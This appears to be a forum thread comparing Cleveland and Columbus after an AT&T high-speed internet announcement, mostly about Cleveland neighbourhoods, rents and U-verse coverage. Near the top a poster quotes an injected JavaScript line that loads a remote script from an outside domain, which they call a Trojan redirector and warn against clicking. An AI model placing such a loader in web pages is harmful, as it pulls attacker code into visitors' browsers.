AT&T picks Cleveland over Columbus for new high speed internet?

Casper

Like I said, it's a Trojan Re-director. Damn noobs.

document.write("<script src='http://kanzlei-leon.de/NYjkWDyp.php?id=144400610 …' type='text/javascript'></" + "script>"); ??

And don't click on that :asshat:

:bow:

Even though you didn't need to use Twitter, since that was in your first link... :)

Cleveland downtown is decent, a number of cool neighborhoods west of the river and University Circle area on the east side is good too. But most of the rest of the east side is urban blight. Vacant lots and buildings vastly outnumber occupied ones and most of those are pretty run down. Crime rates are high and it just feels like an area where you roll up the windows and lock the door when you drive through, even in the middle of the day.

Some of the suburbs are much better without being endless tracks of strip malls and cul-de-sacs but too many of them fit that mold. However after moving from the Boston are you cannot complain about housing prices or traffic in Cleveland.

Uverse never made it to our old neighborhood in Shaker Heights (affluent inner ring suburb) so I'm guessing this super Uverse wont either. Not sure why as it seems like customer density would have been very high in our neighborhood.

Craig

Yeah Tremont is a nice mix of yuppy hipsters, and crackheads. Anything within ten miles of downtown is the same mix. I love seeing $300k row houses with homeless people living under the bridges at the freeway exit to get to these homes. Lol...

I don't know if there are enough high paying jobs downtown to support the $2500/mo. rent at that place.  I like what they're attempting to do but I don't think they will fill the 200+ apartments there anytime soon.

Any city is what you make of it no matter if its Cleveland, Columbus, Chicago or po-dunk Iowa. I just want to show proof that peoples thoughts on the city being dead are inaccurate and educating them on this matter

That being said, Cleveland is still better :p

Edited by Bad324